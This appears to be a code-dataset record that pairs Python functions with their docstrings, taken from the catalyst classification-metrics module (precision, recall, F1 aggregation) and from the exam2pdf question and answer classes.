8209d32ab3e855d98fdd767af7583618c6c4f4fea7c403afe5ed98c5e0443f5e
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Tuple[(Any, Any, Any, Any)]: '\n Update statistics and return intermediate metrics results\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n tuple of metrics intermediate results with per-class, micro, macro and\n weighted averaging\n ' (tn, fp, fn, tp, support) = super().update(outputs=outputs, targets=targets) (per_class, micro, macro, weighted) = get_aggregated_metrics(tp=tp, fp=fp, fn=fn, support=support, zero_division=self.zero_division) return (per_class, micro, macro, weighted)
Update statistics and return intermediate metrics results Args: outputs: prediction values targets: true answers Returns: tuple of metrics intermediate results with per-class, micro, macro and weighted averaging
catalyst/metrics/_classification.py
update
ifixdocs/catalyst
1
python
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Tuple[(Any, Any, Any, Any)]: '\n Update statistics and return intermediate metrics results\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n tuple of metrics intermediate results with per-class, micro, macro and\n weighted averaging\n ' (tn, fp, fn, tp, support) = super().update(outputs=outputs, targets=targets) (per_class, micro, macro, weighted) = get_aggregated_metrics(tp=tp, fp=fp, fn=fn, support=support, zero_division=self.zero_division) return (per_class, micro, macro, weighted)
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Tuple[(Any, Any, Any, Any)]: '\n Update statistics and return intermediate metrics results\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n tuple of metrics intermediate results with per-class, micro, macro and\n weighted averaging\n ' (tn, fp, fn, tp, support) = super().update(outputs=outputs, targets=targets) (per_class, micro, macro, weighted) = get_aggregated_metrics(tp=tp, fp=fp, fn=fn, support=support, zero_division=self.zero_division) return (per_class, micro, macro, weighted)<|docstring|>Update statistics and return intermediate metrics results Args: outputs: prediction values targets: true answers Returns: tuple of metrics intermediate results with per-class, micro, macro and weighted averaging<|endoftext|>
45cbbd238a0fcc120819d600ce1fd4065caa6d8773e83453f683db7a5806091c
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return intermediate metrics results\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n dict of metrics intermediate results\n ' (per_class, micro, macro, weighted) = self.update(outputs=outputs, targets=targets) metrics = self._convert_metrics_to_kv(per_class=per_class, micro=micro, macro=macro, weighted=weighted) return metrics
Update statistics and return intermediate metrics results Args: outputs: prediction values targets: true answers Returns: dict of metrics intermediate results
catalyst/metrics/_classification.py
update_key_value
ifixdocs/catalyst
1
python
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return intermediate metrics results\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n dict of metrics intermediate results\n ' (per_class, micro, macro, weighted) = self.update(outputs=outputs, targets=targets) metrics = self._convert_metrics_to_kv(per_class=per_class, micro=micro, macro=macro, weighted=weighted) return metrics
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return intermediate metrics results\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n dict of metrics intermediate results\n ' (per_class, micro, macro, weighted) = self.update(outputs=outputs, targets=targets) metrics = self._convert_metrics_to_kv(per_class=per_class, micro=micro, macro=macro, weighted=weighted) return metrics<|docstring|>Update statistics and return intermediate metrics results Args: outputs: prediction values targets: true answers Returns: dict of metrics intermediate results<|endoftext|>
f351b880c3f9b3d9ebd767bf5953ffedb9868a2ff591bffbb0f01e3b03524e26
def compute(self) -> Any: '\n Compute precision, recall, f1 score and support.\n Compute micro, macro and weighted average for the metrics.\n\n Returns:\n list of aggregated metrics: per-class, micro, macro and weighted averaging of\n precision, recall, f1 score and support metrics\n ' (per_class, micro, macro, weighted) = get_aggregated_metrics(tp=self.statistics['tp'], fp=self.statistics['fp'], fn=self.statistics['fn'], support=self.statistics['support'], zero_division=self.zero_division) return (per_class, micro, macro, weighted)
Compute precision, recall, f1 score and support. Compute micro, macro and weighted average for the metrics. Returns: list of aggregated metrics: per-class, micro, macro and weighted averaging of precision, recall, f1 score and support metrics
catalyst/metrics/_classification.py
compute
ifixdocs/catalyst
1
python
def compute(self) -> Any: '\n Compute precision, recall, f1 score and support.\n Compute micro, macro and weighted average for the metrics.\n\n Returns:\n list of aggregated metrics: per-class, micro, macro and weighted averaging of\n precision, recall, f1 score and support metrics\n ' (per_class, micro, macro, weighted) = get_aggregated_metrics(tp=self.statistics['tp'], fp=self.statistics['fp'], fn=self.statistics['fn'], support=self.statistics['support'], zero_division=self.zero_division) return (per_class, micro, macro, weighted)
def compute(self) -> Any: '\n Compute precision, recall, f1 score and support.\n Compute micro, macro and weighted average for the metrics.\n\n Returns:\n list of aggregated metrics: per-class, micro, macro and weighted averaging of\n precision, recall, f1 score and support metrics\n ' (per_class, micro, macro, weighted) = get_aggregated_metrics(tp=self.statistics['tp'], fp=self.statistics['fp'], fn=self.statistics['fn'], support=self.statistics['support'], zero_division=self.zero_division) return (per_class, micro, macro, weighted)<|docstring|>Compute precision, recall, f1 score and support. Compute micro, macro and weighted average for the metrics. Returns: list of aggregated metrics: per-class, micro, macro and weighted averaging of precision, recall, f1 score and support metrics<|endoftext|>
6a27288a217b8ea0edd136f1a86b06b7c397acf33c148e7033f92e42ca0bfe91
def compute_key_value(self) -> Dict[(str, float)]: '\n Compute precision, recall, f1 score and support.\n Compute micro, macro and weighted average for the metrics.\n\n Returns:\n dict of metrics\n ' if self._is_ddp: for key in self.statistics: value: List[np.ndarray] = all_gather(self.statistics[key]) value: np.ndarray = np.sum(np.vstack(value), axis=0) self.statistics[key] = value (per_class, micro, macro, weighted) = self.compute() metrics = self._convert_metrics_to_kv(per_class=per_class, micro=micro, macro=macro, weighted=weighted) return metrics
Compute precision, recall, f1 score and support. Compute micro, macro and weighted average for the metrics. Returns: dict of metrics
catalyst/metrics/_classification.py
compute_key_value
ifixdocs/catalyst
1
python
def compute_key_value(self) -> Dict[(str, float)]: '\n Compute precision, recall, f1 score and support.\n Compute micro, macro and weighted average for the metrics.\n\n Returns:\n dict of metrics\n ' if self._is_ddp: for key in self.statistics: value: List[np.ndarray] = all_gather(self.statistics[key]) value: np.ndarray = np.sum(np.vstack(value), axis=0) self.statistics[key] = value (per_class, micro, macro, weighted) = self.compute() metrics = self._convert_metrics_to_kv(per_class=per_class, micro=micro, macro=macro, weighted=weighted) return metrics
def compute_key_value(self) -> Dict[(str, float)]: '\n Compute precision, recall, f1 score and support.\n Compute micro, macro and weighted average for the metrics.\n\n Returns:\n dict of metrics\n ' if self._is_ddp: for key in self.statistics: value: List[np.ndarray] = all_gather(self.statistics[key]) value: np.ndarray = np.sum(np.vstack(value), axis=0) self.statistics[key] = value (per_class, micro, macro, weighted) = self.compute() metrics = self._convert_metrics_to_kv(per_class=per_class, micro=micro, macro=macro, weighted=weighted) return metrics<|docstring|>Compute precision, recall, f1 score and support. Compute micro, macro and weighted average for the metrics. Returns: dict of metrics<|endoftext|>
bf9c8bf9b9841be8372d036cbdbfb3ace7e29522e69aff3ef0add30a152c064e
def __init__(self, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): 'Init BinaryPrecisionRecallF1SupportMetric instance' super().__init__(num_classes=2, mode='binary', compute_on_call=compute_on_call, prefix=prefix, suffix=suffix) self.zero_division = zero_division self.reset()
Init BinaryPrecisionRecallF1SupportMetric instance
catalyst/metrics/_classification.py
__init__
ifixdocs/catalyst
1
python
def __init__(self, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): super().__init__(num_classes=2, mode='binary', compute_on_call=compute_on_call, prefix=prefix, suffix=suffix) self.zero_division = zero_division self.reset()
def __init__(self, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): super().__init__(num_classes=2, mode='binary', compute_on_call=compute_on_call, prefix=prefix, suffix=suffix) self.zero_division = zero_division self.reset()<|docstring|>Init BinaryPrecisionRecallF1SupportMetric instance<|endoftext|>
e95838b898674e31c9024ac7642db542932474c5973947e89ac6e81e0b41c653
@staticmethod def _convert_metrics_to_kv(precision_value: float, recall_value: float, f1_value: float) -> Dict[(str, float)]: '\n Convert list of metrics to key-value\n\n Args:\n precision_value: precision value\n recall_value: recall value\n f1_value: f1 value\n\n Returns:\n dict of metrics\n ' kv_metrics = {'precision': precision_value, 'recall': recall_value, 'f1': f1_value} return kv_metrics
Convert list of metrics to key-value Args: precision_value: precision value recall_value: recall value f1_value: f1 value Returns: dict of metrics
catalyst/metrics/_classification.py
_convert_metrics_to_kv
ifixdocs/catalyst
1
python
@staticmethod def _convert_metrics_to_kv(precision_value: float, recall_value: float, f1_value: float) -> Dict[(str, float)]: '\n Convert list of metrics to key-value\n\n Args:\n precision_value: precision value\n recall_value: recall value\n f1_value: f1 value\n\n Returns:\n dict of metrics\n ' kv_metrics = {'precision': precision_value, 'recall': recall_value, 'f1': f1_value} return kv_metrics
@staticmethod def _convert_metrics_to_kv(precision_value: float, recall_value: float, f1_value: float) -> Dict[(str, float)]: '\n Convert list of metrics to key-value\n\n Args:\n precision_value: precision value\n recall_value: recall value\n f1_value: f1 value\n\n Returns:\n dict of metrics\n ' kv_metrics = {'precision': precision_value, 'recall': recall_value, 'f1': f1_value} return kv_metrics<|docstring|>Convert list of metrics to key-value Args: precision_value: precision value recall_value: recall value f1_value: f1 value Returns: dict of metrics<|endoftext|>
5b8c09b9208671c395e769a9f6e11cac04ee230656377153b7082ce23c574928
def reset(self) -> None: 'Reset all the statistics and metrics fields.' self.statistics = defaultdict(float)
Reset all the statistics and metrics fields.
catalyst/metrics/_classification.py
reset
ifixdocs/catalyst
1
python
def reset(self) -> None: self.statistics = defaultdict(float)
def reset(self) -> None: self.statistics = defaultdict(float)<|docstring|>Reset all the statistics and metrics fields.<|endoftext|>
ef102ef01d74ffa3a113eee52801c1a257a76a0b53ac6b78c3fa3729bf17432d
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Tuple[(float, float, float)]: '\n Update statistics and return metrics intermediate results\n\n Args:\n outputs: predicted labels\n targets: target labels\n\n Returns:\n tuple of intermediate metrics: precision, recall, f1 score\n ' (tn, fp, fn, tp, support) = super().update(outputs=outputs, targets=targets) (precision_value, recall_value, f1_value) = get_binary_metrics(tp=tp, fp=fp, fn=fn, zero_division=self.zero_division) return (precision_value, recall_value, f1_value)
Update statistics and return metrics intermediate results Args: outputs: predicted labels targets: target labels Returns: tuple of intermediate metrics: precision, recall, f1 score
catalyst/metrics/_classification.py
update
ifixdocs/catalyst
1
python
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Tuple[(float, float, float)]: '\n Update statistics and return metrics intermediate results\n\n Args:\n outputs: predicted labels\n targets: target labels\n\n Returns:\n tuple of intermediate metrics: precision, recall, f1 score\n ' (tn, fp, fn, tp, support) = super().update(outputs=outputs, targets=targets) (precision_value, recall_value, f1_value) = get_binary_metrics(tp=tp, fp=fp, fn=fn, zero_division=self.zero_division) return (precision_value, recall_value, f1_value)
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Tuple[(float, float, float)]: '\n Update statistics and return metrics intermediate results\n\n Args:\n outputs: predicted labels\n targets: target labels\n\n Returns:\n tuple of intermediate metrics: precision, recall, f1 score\n ' (tn, fp, fn, tp, support) = super().update(outputs=outputs, targets=targets) (precision_value, recall_value, f1_value) = get_binary_metrics(tp=tp, fp=fp, fn=fn, zero_division=self.zero_division) return (precision_value, recall_value, f1_value)<|docstring|>Update statistics and return metrics intermediate results Args: outputs: predicted labels targets: target labels Returns: tuple of intermediate metrics: precision, recall, f1 score<|endoftext|>
ee4685f7db931f401aa3a41ffb42955cc36c57a58ab660648c6c998ec42354d9
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return metrics intermediate results\n\n Args:\n outputs: predicted labels\n targets: target labels\n\n Returns:\n dict of intermediate metrics\n ' (precision_value, recall_value, f1_value) = self.update(outputs=outputs, targets=targets) kv_metrics = self._convert_metrics_to_kv(precision_value=precision_value, recall_value=recall_value, f1_value=f1_value) return kv_metrics
Update statistics and return metrics intermediate results Args: outputs: predicted labels targets: target labels Returns: dict of intermediate metrics
catalyst/metrics/_classification.py
update_key_value
ifixdocs/catalyst
1
python
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return metrics intermediate results\n\n Args:\n outputs: predicted labels\n targets: target labels\n\n Returns:\n dict of intermediate metrics\n ' (precision_value, recall_value, f1_value) = self.update(outputs=outputs, targets=targets) kv_metrics = self._convert_metrics_to_kv(precision_value=precision_value, recall_value=recall_value, f1_value=f1_value) return kv_metrics
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return metrics intermediate results\n\n Args:\n outputs: predicted labels\n targets: target labels\n\n Returns:\n dict of intermediate metrics\n ' (precision_value, recall_value, f1_value) = self.update(outputs=outputs, targets=targets) kv_metrics = self._convert_metrics_to_kv(precision_value=precision_value, recall_value=recall_value, f1_value=f1_value) return kv_metrics<|docstring|>Update statistics and return metrics intermediate results Args: outputs: predicted labels targets: target labels Returns: dict of intermediate metrics<|endoftext|>
1ff2a55e956de53f2978964bf26f17141c5b1294bbf13b6cfcac49af8901d242
def compute(self) -> Tuple[(float, float, float)]: '\n Compute metrics with accumulated statistics\n\n Returns:\n tuple of metrics: precision, recall, f1 score\n ' if self._is_ddp: for key in self.statistics: value: List[float] = all_gather(self.statistics[key]) value: float = sum(value) self.statistics[key] = value (precision_value, recall_value, f1_value) = get_binary_metrics(tp=self.statistics['tp'], fp=self.statistics['fp'], fn=self.statistics['fn'], zero_division=self.zero_division) return (precision_value, recall_value, f1_value)
Compute metrics with accumulated statistics Returns: tuple of metrics: precision, recall, f1 score
catalyst/metrics/_classification.py
compute
ifixdocs/catalyst
1
python
def compute(self) -> Tuple[(float, float, float)]: '\n Compute metrics with accumulated statistics\n\n Returns:\n tuple of metrics: precision, recall, f1 score\n ' if self._is_ddp: for key in self.statistics: value: List[float] = all_gather(self.statistics[key]) value: float = sum(value) self.statistics[key] = value (precision_value, recall_value, f1_value) = get_binary_metrics(tp=self.statistics['tp'], fp=self.statistics['fp'], fn=self.statistics['fn'], zero_division=self.zero_division) return (precision_value, recall_value, f1_value)
def compute(self) -> Tuple[(float, float, float)]: '\n Compute metrics with accumulated statistics\n\n Returns:\n tuple of metrics: precision, recall, f1 score\n ' if self._is_ddp: for key in self.statistics: value: List[float] = all_gather(self.statistics[key]) value: float = sum(value) self.statistics[key] = value (precision_value, recall_value, f1_value) = get_binary_metrics(tp=self.statistics['tp'], fp=self.statistics['fp'], fn=self.statistics['fn'], zero_division=self.zero_division) return (precision_value, recall_value, f1_value)<|docstring|>Compute metrics with accumulated statistics Returns: tuple of metrics: precision, recall, f1 score<|endoftext|>
5a56b377f6f1414df4f74e596ca7b9a8bd0ad57011c1a71644aaf3751a982c8a
def compute_key_value(self) -> Dict[(str, float)]: '\n Compute metrics with all accumulated statistics\n\n Returns:\n dict of metrics\n ' (precision_value, recall_value, f1_value) = self.compute() kv_metrics = self._convert_metrics_to_kv(precision_value=precision_value, recall_value=recall_value, f1_value=f1_value) return kv_metrics
Compute metrics with all accumulated statistics Returns: dict of metrics
catalyst/metrics/_classification.py
compute_key_value
ifixdocs/catalyst
1
python
def compute_key_value(self) -> Dict[(str, float)]: '\n Compute metrics with all accumulated statistics\n\n Returns:\n dict of metrics\n ' (precision_value, recall_value, f1_value) = self.compute() kv_metrics = self._convert_metrics_to_kv(precision_value=precision_value, recall_value=recall_value, f1_value=f1_value) return kv_metrics
def compute_key_value(self) -> Dict[(str, float)]: '\n Compute metrics with all accumulated statistics\n\n Returns:\n dict of metrics\n ' (precision_value, recall_value, f1_value) = self.compute() kv_metrics = self._convert_metrics_to_kv(precision_value=precision_value, recall_value=recall_value, f1_value=f1_value) return kv_metrics<|docstring|>Compute metrics with all accumulated statistics Returns: dict of metrics<|endoftext|>
3f16057e7f825cfba763990b30d799c18fbbe402ad4a5c6a013b03f8ad5224c2
def __init__(self, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): 'Init MultiClassPrecisionRecallF1SupportMetric instance' super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, zero_division=zero_division, mode='multiclass')
Init MultiClassPrecisionRecallF1SupportMetric instance
catalyst/metrics/_classification.py
__init__
ifixdocs/catalyst
1
python
def __init__(self, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, zero_division=zero_division, mode='multiclass')
def __init__(self, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, zero_division=zero_division, mode='multiclass')<|docstring|>Init MultiClassPrecisionRecallF1SupportMetric instance<|endoftext|>
85128887433d9132c1ee931685fdba10f0e407a229fb82bbf02f557b56c156b9
def __init__(self, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): 'Init MultiLabelPrecisionRecallF1SupportMetric instance' super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, zero_division=zero_division, mode='multilabel')
Init MultiLabelPrecisionRecallF1SupportMetric instance
catalyst/metrics/_classification.py
__init__
ifixdocs/catalyst
1
python
def __init__(self, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, zero_division=zero_division, mode='multilabel')
def __init__(self, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, zero_division=zero_division, mode='multilabel')<|docstring|>Init MultiLabelPrecisionRecallF1SupportMetric instance<|endoftext|>
3add48f507c5f5c94709143dc9aaf3fedbcb927df2745470e6ae7cc148740d25
@text.setter def text(self, text: str) -> None: 'Text is the answer.\n ' if isinstance(text, str): self._text = text else: raise TypeError(f'{text} is not a string')
Text is the answer.
exam2pdf/question.py
text
agossino/exam2pdf
0
python
@text.setter def text(self, text: str) -> None: '\n ' if isinstance(text, str): self._text = text else: raise TypeError(f'{text} is not a string')
@text.setter def text(self, text: str) -> None: '\n ' if isinstance(text, str): self._text = text else: raise TypeError(f'{text} is not a string')<|docstring|>Text is the answer.<|endoftext|>
e5eed5240186032b28b730f178a27f82e97a24878b25545e3cc1367384f5d86d
@property def image(self) -> Path: 'Image associated with the answer: it can help or\n can be the answer.\n ' return self._image
Image associated with the answer: it can help or can be the answer.
exam2pdf/question.py
image
agossino/exam2pdf
0
python
@property def image(self) -> Path: 'Image associated with the answer: it can help or\n can be the answer.\n ' return self._image
@property def image(self) -> Path: 'Image associated with the answer: it can help or\n can be the answer.\n ' return self._image<|docstring|>Image associated with the answer: it can help or can be the answer.<|endoftext|>
da687c250c8b7abd85eb7c9de053ca2ae11326c112f587114bd03b18a1f27d9b
@property def attr_load_sequence(self) -> Tuple[(str, ...)]: 'Answer can be set by load_sequentially method: this attribute\n return the order the attribute are set' return self._attr_load_sequence
Answer can be set by load_sequentially method: this attribute return the order the attribute are set
exam2pdf/question.py
attr_load_sequence
agossino/exam2pdf
0
python
@property def attr_load_sequence(self) -> Tuple[(str, ...)]: 'Answer can be set by load_sequentially method: this attribute\n return the order the attribute are set' return self._attr_load_sequence
@property def attr_load_sequence(self) -> Tuple[(str, ...)]: 'Answer can be set by load_sequentially method: this attribute\n return the order the attribute are set' return self._attr_load_sequence<|docstring|>Answer can be set by load_sequentially method: this attribute return the order the attribute are set<|endoftext|>
09883976c625c883ac4b1ab07dcd1fb9f68b430591682849f8336de5183851d8
def load_sequentially(self, iterator: Iterator[Any]) -> None: 'Load all the attribute sequentially from iterator. Return\n when all attribute are filled. If the elements in the iterator\n are less then the attributes, StopIteration is not caught.\n ' attribute_iterator: Iterator[str] = iter(self.attr_load_sequence) caster_iterator: Iterator[CasterType] = iter(self._type_caster_sequence) attribute: Optional[str] = next(attribute_iterator, None) caster: Optional[CasterType] = next(caster_iterator, None) while ((attribute is not None) and (caster is not None)): setattr(self, attribute, caster(next(iterator))) attribute = next(attribute_iterator, None) caster = next(caster_iterator, None)
Load all the attribute sequentially from iterator. Return when all attribute are filled. If the elements in the iterator are less then the attributes, StopIteration is not caught.
exam2pdf/question.py
load_sequentially
agossino/exam2pdf
0
python
def load_sequentially(self, iterator: Iterator[Any]) -> None: 'Load all the attribute sequentially from iterator. Return\n when all attribute are filled. If the elements in the iterator\n are less then the attributes, StopIteration is not caught.\n ' attribute_iterator: Iterator[str] = iter(self.attr_load_sequence) caster_iterator: Iterator[CasterType] = iter(self._type_caster_sequence) attribute: Optional[str] = next(attribute_iterator, None) caster: Optional[CasterType] = next(caster_iterator, None) while ((attribute is not None) and (caster is not None)): setattr(self, attribute, caster(next(iterator))) attribute = next(attribute_iterator, None) caster = next(caster_iterator, None)
def load_sequentially(self, iterator: Iterator[Any]) -> None: 'Load all the attribute sequentially from iterator. Return\n when all attribute are filled. If the elements in the iterator\n are less then the attributes, StopIteration is not caught.\n ' attribute_iterator: Iterator[str] = iter(self.attr_load_sequence) caster_iterator: Iterator[CasterType] = iter(self._type_caster_sequence) attribute: Optional[str] = next(attribute_iterator, None) caster: Optional[CasterType] = next(caster_iterator, None) while ((attribute is not None) and (caster is not None)): setattr(self, attribute, caster(next(iterator))) attribute = next(attribute_iterator, None) caster = next(caster_iterator, None)<|docstring|>Load all the attribute sequentially from iterator. Return when all attribute are filled. If the elements in the iterator are less then the attributes, StopIteration is not caught.<|endoftext|>
317db48a59c2f1e23c87f90d43be6650276ea201800a017c125f6dfd0c6f82ab
@text.setter def text(self, text: str) -> None: 'Text is the question.\n ' if isinstance(text, str): self._text = text else: raise TypeError(f'{text} in not a string')
Text is the question.
exam2pdf/question.py
text
agossino/exam2pdf
0
python
@text.setter def text(self, text: str) -> None: '\n ' if isinstance(text, str): self._text = text else: raise TypeError(f'{text} in not a string')
@text.setter def text(self, text: str) -> None: '\n ' if isinstance(text, str): self._text = text else: raise TypeError(f'{text} in not a string')<|docstring|>Text is the question.<|endoftext|>
353f7ac3d6e0a1046fde3b4380a1dc3aa965ba5e657e6a064edc6cadb6972084
@image.setter def image(self, file_path: Path) -> None: 'Image cha help or can be the question itself.\n ' if isinstance(file_path, Path): self._image = file_path else: raise TypeError(f'{file_path} is not a Path')
Image cha help or can be the question itself.
exam2pdf/question.py
image
agossino/exam2pdf
0
python
@image.setter def image(self, file_path: Path) -> None: '\n ' if isinstance(file_path, Path): self._image = file_path else: raise TypeError(f'{file_path} is not a Path')
@image.setter def image(self, file_path: Path) -> None: '\n ' if isinstance(file_path, Path): self._image = file_path else: raise TypeError(f'{file_path} is not a Path')<|docstring|>Image cha help or can be the question itself.<|endoftext|>
b62e6276b042260623c105cb135c14dd4bc9c584708d38b402c62169d21491c2
@subject.setter def subject(self, name: str) -> None: 'The subject of the question.\n ' if isinstance(name, str): self._subject = name else: raise TypeError(f'{name} is not a string')
The subject of the question.
exam2pdf/question.py
subject
agossino/exam2pdf
0
python
@subject.setter def subject(self, name: str) -> None: '\n ' if isinstance(name, str): self._subject = name else: raise TypeError(f'{name} is not a string')
@subject.setter def subject(self, name: str) -> None: '\n ' if isinstance(name, str): self._subject = name else: raise TypeError(f'{name} is not a string')<|docstring|>The subject of the question.<|endoftext|>
01547ab385cd6d809e68ccc2a32fd582d8e8f373891786c3f611f9660bac3023
@level.setter def level(self, value: int) -> None: 'The level of difficulty.\n ' if isinstance(value, int): self._level = value else: raise TypeError(f'{value} is not an int')
The level of difficulty.
exam2pdf/question.py
level
agossino/exam2pdf
0
python
@level.setter def level(self, value: int) -> None: '\n ' if isinstance(value, int): self._level = value else: raise TypeError(f'{value} is not an int')
@level.setter def level(self, value: int) -> None: '\n ' if isinstance(value, int): self._level = value else: raise TypeError(f'{value} is not an int')<|docstring|>The level of difficulty.<|endoftext|>